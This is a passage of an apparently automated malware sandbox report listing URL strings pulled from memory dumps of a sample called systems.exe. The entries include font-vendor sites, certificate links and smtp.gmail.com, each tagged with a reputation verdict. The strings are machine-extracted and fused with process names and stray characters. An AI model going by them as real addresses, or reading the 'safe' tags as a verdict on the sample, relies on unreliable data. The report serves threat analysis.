                      http://pki.goog/repo/certs/gtsr1.der04systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823791013.000000000616F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457188901.00000000061A5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.sajatypeworks.comsystems.exe, 00000007.00000003.407149985.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.406990546.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cnhtsystems.exe, 00000007.00000003.413233364.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/9systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416485037.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cn/cThesystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.comgretasystems.exe, 00000007.00000003.451835767.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442388907.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451120837.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442278325.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450386784.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451358905.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441736083.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442020963.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.452320757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451607757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441472380.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.449653969.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.449871222.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450875400.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450170584.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450609069.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.452067543.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.carterandcone.comSmasystems.exe, 00000007.00000003.415116859.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/0systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416485037.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/n-usystems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416485037.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.galapagosdesign.com/DPleasesystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/Y0systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.comgritosystems.exe, 00000007.00000003.422681830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/cabarga.htmlPGsystems.exe, 00000007.00000003.425241889.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.urwpp.deDPleasesystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.zhongyicts.com.cnsystems.exe, 00000007.00000003.414673072.0000000006EF5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesystems.exe, 00000007.00000002.817146400.0000000002561000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://smtp.gmail.comsystems.exe, 00000007.00000002.818473425.000000000273C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.mggexplorer.exe, 00000022.00000002.816968535.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.816155113.0000000005429000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.comalic9systems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427007078.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.galapagosdesign.com/systems.exe, 00000007.00000003.430883500.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.431114108.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnL5systems.exe, 00000007.00000003.413233364.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/Ssystems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-jones.htmlpsystems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425241889.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425049325.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424890569.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424654751.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424305125.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425778256.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424172051.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424472735.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425479830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.galapagosdesign.com/staff/dennis.htmjsystems.exe, 00000007.00000003.430883500.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.431510467.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.431114108.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.431730763.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.431309575.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.pki.goog/gtsr1/gtsr1.crl0Wsystems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823791013.000000000616F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457188901.00000000061A5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Esystems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/lic0systems.exe, 00000007.00000003.416033999.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416204040.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.carterandcone.comtsystems.exe, 00000007.00000003.415258973.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://pki.goog/repository/0systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823791013.000000000616F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457188901.00000000061A5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.micrexplorer.exe, 0000001B.00000002.816186087.00000000053C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.819234756.0000000004618000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comisystems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comgsystems.exe, 00000007.00000003.414826258.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://en.wsystems.exe, 00000007.00000003.407930819.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.407495049.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.408174010.0000000006EE9000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.407336462.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.408068459.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.407649600.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.407793751.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlsystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/Ssystems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428310301.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422256465.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425241889.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422815987.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425049325.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424890569.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422967285.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424654751.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.421943470.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422095171.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423126605.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.ascendercorp.com/typedesigners.htmlwsystems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.comFxsystems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424654751.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424305125.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424172051.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424472735.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlsystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.comalicSsystems.exe, 00000007.00000003.442388907.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442278325.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441736083.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442020963.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comoitusystems.exe, 00000007.00000003.422815987.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422967285.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423126605.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423319847.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423679779.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423852630.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423496830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/ssystems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.founder.com.cn/cn)5/systems.exe, 00000007.00000003.413651062.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.comalsFEsystems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426303683.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425778256.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426081001.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426446779.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.pki.goog/gtsystems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/jsystems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416485037.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416033999.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416204040.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn/R8systems.exe, 00000007.00000003.413957196.0000000006EF4000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414026080.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.413874101.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414103181.0000000006EF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/asystems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comONsystems.exe, 00000007.00000003.415470289.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.carterandcone.comsigsystems.exe, 00000007.00000003.414826258.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.founder.com.cn/cnP5-systems.exe, 00000007.00000003.413233364.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designersGsystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.pki.goog/gsr1/gsr1.crl0;systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457810585.0000000006150000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823791013.000000000616F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823863544.000000000619F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
